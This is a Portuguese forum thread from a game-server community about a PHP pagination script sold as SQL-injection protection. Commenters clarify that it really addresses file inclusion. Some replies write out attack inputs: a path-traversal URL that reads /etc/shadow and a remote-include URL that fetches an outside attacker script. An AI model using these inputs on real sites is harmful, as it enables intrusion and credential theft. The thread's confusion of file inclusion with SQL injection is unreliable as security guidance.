Script de paginação anti SQL inject

[Ivan Pires]

Fala pessoal, eu vejo muita gente até hoje postando sites, painéis e scripts aqui no fórum, só que todos vulneráveis a sql inject e muito servidor de L2 fecha por causa disso. Então eu resolvi compartilhar com vocês o meu sistema de PAGINAÇÃO protegido contra sql inject.

O conteúdo está oculto, favor efetuar login ou se cadastrar!

• Entre
• ou
• Cadastre-se

É bem simples de usar, vocês só precisam adicionar na index.php e preencher as variaveis $pasta e $home como precisarem.

Depois que adicionarem o script na index.php usem o seguinte link de exemplo para abrir suas páginas:
index.php?pag=home
index.php?pag=downloads
index.php?pag=contato

Créditos: 500% meus.

Abraço a todos!
~Fui

Editado Julho 17, 2014 por Ivan Pires

[LORD_KILL]

Ivan poderia me explicar mais sou meio lerdo Rs tipo o que seria um sql inject

e o que colocar nesta area $pasta e $home

Desde já agradeço

[Ivan Pires]

Ivan poderia me explicar mais sou meio lerdo Rs tipo o que seria um sql inject

e o que colocar nesta area $pasta e $home

Desde já agradeço

SQL inject é quando alguém consegue invadir o seu banco de dados por falhas na segurança do seu site.

Esse script que eu fiz ele só protege o sistema de paginação do site, porem o SQL inject pode ser feito de muitas outras maneiras.

Sobre as 2 variáveis se você não entendeu você vai precisar dar uma estudada melhor sobre sites, pois já está explicado o que é no script, se você mesmo assim não entendeu é pq você ainda não sabe nem o basico, então não tem como eu te explicar, você vai precisar dar uma estudada primeiro. =)

Abraço.

[LORD_KILL]

Hum intendo vou adicionar isso ao meu site obrigado por compartilhar sobre as variáveis eu entendi agora basta eu colocar em pasta o local a onde estas minhas paginas em php exemplo www/paginas

e no home minha index acho que é isso

mais uma vez obrigado ^^

[Ivan Pires]

Hum intendo vou adicionar isso ao meu site obrigado por compartilhar sobre as variáveis eu entendi agora basta eu colocar em pasta o local a onde estas minhas paginas em php exemplo www/paginas

e no home minha index acho que é isso

mais uma vez obrigado ^^

É mais ou menos isso. huehueuhehu

Qualquer dúvida posta ai.

[LORD_KILL]

Consegui adicionar não a unica coisa a fazer agora é razer para que ninguém faça isso contra mim

[xXTESTAXx]

 

Fala pessoal, eu vejo muita gente até hoje postando sites, painéis e scripts aqui no fórum, só que todos vulneráveis a sql inject e muito servidor de L2 fecha por causa disso. Então eu resolvi compartilhar com vocês o meu sistema de PAGINAÇÃO protegido contra sql inject.

 

O conteúdo está oculto, favor efetuar login ou se cadastrar!

• Entre
• ou
• Cadastre-se

 

É bem simples de usar, vocês só precisam adicionar na index.php e preencher as variaveis $pasta e $home como precisarem.

 

Depois que adicionarem o script na index.php usem o seguinte link de exemplo para abrir suas páginas:

index.php?pag=home

index.php?pag=downloads

index.php?pag=contato

 

Créditos: 500% meus.

 

Abraço a todos!

~Fui

 

 

Obrigado cara isto ajuda muito.

Poderia nos ajudar com o sistema mais avançado de proteção futuramente?

Grato.

[Juudas]

ivan, na variavel $pasta, ela vai incluir as subpastas que estão dentro?

 

porque tenho uma pasta no meu website chamada 'scripts' e ali dentro estou criando diversas outras pastas com todos os scripts que estou achando necessario!

 

e a variavel $home é simplesmente o endereco da minha pagina inicial?

 

obrigado pelo share amigo :)

[Ivan Pires]

Não, ele só inclui a pasta que estiver na variável.

Mas pra que você quer fazer com subpastas?

Da pra fazer também, mas não vejo a necessidade.

Pq se você tiver algum arquivo que vá chamar dentro da subpastas, você adiciona esse script nesse arquivo com o link da subpasta.

Aí, no caso ficaria assim:

 

index.php?pags=PAGINA&sub=OUTRAPAGINA

 

Nesse caso você coloca o script na index.php e na PAGINA.php

A index vai incluir a pagina PAGINA e a página PAGINA vai incluir a página OUTRAPAGINA

 

Deu pra entender?

 

Assim você pode usar uma pasta e uma subpasta.

 

A não ser que você precise que a index leia as subpastas, aí sim precisa fazer um script que inclua as subpastas.

[WilliamArcher]

Cara não tem como fazer SQL Injection sem um banco de dados até aonde eu vi ali não tem conexão nenhuma com o banco, se quiser fazer anti inject só usar um CAST de inteiro na frente do GET caso a variavel seja inteira ou um mysql_real_escape_string caso seja string ou melhor ainda se for coisa pequena exemplo páginas do site substitua valores

 

EX:

 

site.com.br/index.php?pag=home

 

switch($_GET['pag'])

{

case 'home':

$pg = 'home.php';

break;

 

case 'doacoes':

$pg = 'doacoes.php';

break;

 

default:

$pg = 'home.php';

 

}

 

include_once($pg);

 

tem várias formas de hackiar um site sql injection só é a mais comum tem Session Hijacking que é mais complicada mas tu acessa o sistema sem usar usuário e senha tem como floodar o banco encher de lixo só alterando o html da página tem várias situações, nessa situação sem o tratamento do valor para buscar a página dependendo do servidor da hospedagem pode ser acessado os arquivos do sistema ex:

 

Se fosse linux e o usuário fosse ROOT ou WWW-DATA com permissões de ROOT (comum em várias VPS) o cara digitaria site.com.br/index.php?pag=../../etc/shadow claro dependendo da distribuição mas normalmente é assim em ubuntu

Editado Junho 6, 2014 por WilliamArcher

[Ivan Pires]

Cara não tem como fazer SQL Injection sem um banco de dados até aonde eu vi ali não tem conexão nenhuma com o banco, se quiser fazer anti inject só usar um CAST de inteiro na frente do GET caso a variavel seja inteira ou um mysql_real_escape_string caso seja string ou melhor ainda se for coisa pequena exemplo páginas do site substitua valores

 

EX:

 

site.com.br/index.php?pag=home

 

switch($_GET['pag'])

{

case 'home':

$pg = 'home.php';

break;

 

case 'doacoes':

$pg = 'doacoes.php';

break;

 

default:

$pg = 'home.php';

 

}

 

include_once($pg);

 

tem várias formas de hackiar um site sql injection só é a mais comum tem Session Hijacking que é mais complicada mas tu acessa o sistema sem usar usuário e senha tem como floodar o banco encher de lixo só alterando o html da página tem várias situações, nessa situação sem o tratamento do valor para buscar a página dependendo do servidor da hospedagem pode ser acessado os arquivos do sistema ex:

 

Se fosse linux e o usuário fosse ROOT ou WWW-DATA com permissões de ROOT (comum em várias VPS) o cara digitaria site.com.br/index.php?pag=../../etc/shadow claro dependendo da distribuição mas normalmente é assim em ubuntu

Willian, acho que você não entendeu, você leu o post principal?

Isso é um script de paginação, que protege que seja incluído um arquivo externo para fazer sql inject no site.

No script, é claro que não vai ter nada referente ao banco de dados, pois esse script não trata metodos GET, REQUEST, POST, SESSION ou COOKIES. Esse script não tem relação nenhuma com conexões com bancos de dados, nem com inserts, updates, delete, select e etc. Então, não entendi o pq você fez esse comentário, eu fiquei boiando aqui.

E esse método que você demonstrou acima, nada mais é o que eu fiz, só que o que eu fiz é de forma melhor.

Esse método que você fez é tão bom quanto o que eu fiz, só que o que você fez precisa ficar escrevendo os nomes das páginas linha por linha, o meu script já coloca tudo de forma "automática".

A ideia é fazer um sistema de paginação simples, seguro e que seja fácil de manusear o site.

Caso eu tenha entendido errado, por favor, tente se explicar melhor, pq eu não entendi o que você quis dizer.

Abraço.

[WilliamArcher]

Meu caro tu fez foi uma proteção LFI (Local File Include) SQL Injection como o nome já diz é Injeção de SQL e SQL = BANCO é bom ficar claro pro pessoal entender

[Ivan Pires]

Meu caro tu fez foi uma proteção LFI (Local File Include) SQL Injection como o nome já diz é Injeção de SQL e SQL = BANCO é bom ficar claro pro pessoal entender

William, tem a ver o que você diz, mas você entendeu o que eu quis dizer, certo?

SQL injection é injeção de sql em banco, claro!

Porem o objetivo do script é para sites de Lineage 2, até pq isso é um fórum para Lineage 2. Então, ou seja, praticamente 100% dos sites de Lineage 2 tem conexão com banco de dados, certo?

O objetivo do script é fazer com que não seja possível fazer include de páginas externas e então fazer o SQL inject.

Como você deve saber, por um simples script de paginação é possível fazer um SQL inject a partir de uma outra página.

Por exemplo: www.dominio.com.br/index.php?pags=http://www.meusite.com.br/scriptinject.php

Pode ser utilizado shells e inumeras outras coisas para fazer SQL inject.

Eu entendi o que você falou, você não está errado.

Mas você tem que concordar comigo que eu também não estou errado, depende do ponto de vista.

De qualquer forma, é um script seguro para fazer paginação dos sites.

Se fosse para sites que não tem conexão com banco de dados, claro, não seria um script contra SQL injection. ^^

Porem, como é para sites com banco de dados, eu não acho que não seja contra SQL inject, pois na verdade é, mesmo sendo apenas um LFI. :P

Sei lá, não adianta discutir, nós dois estamos certos nos nossos pontos de vista. hahaha

Abraço.

Editado Junho 7, 2014 por Ivan Pires

[Marcell_xD]

Bom primeiramente eu tentei colocar o script mas sem sucesso.

1 - Erro ficou atualizando a pagina sozinho ai fui e retirei esse trecho do script : <meta HTTP-EQUIV='Refresh' CONTENT='0;URL=./'>

Beleza ai tudo certo consegui fazer a script funciona só que o seguinte

Quando eu clico para abrir a outra pagina a index fica em baixo do site duplicando a pagina em 2.

 

#############

-- Já consegui dei uma pesquisada :D

Editado Janeiro 19, 2015 por Marcell_xD

[ByJrmhp]

@marcel como vc resolveu ?

adicionei aqui mas as paginas aparecem embaixo da index original como resovler ?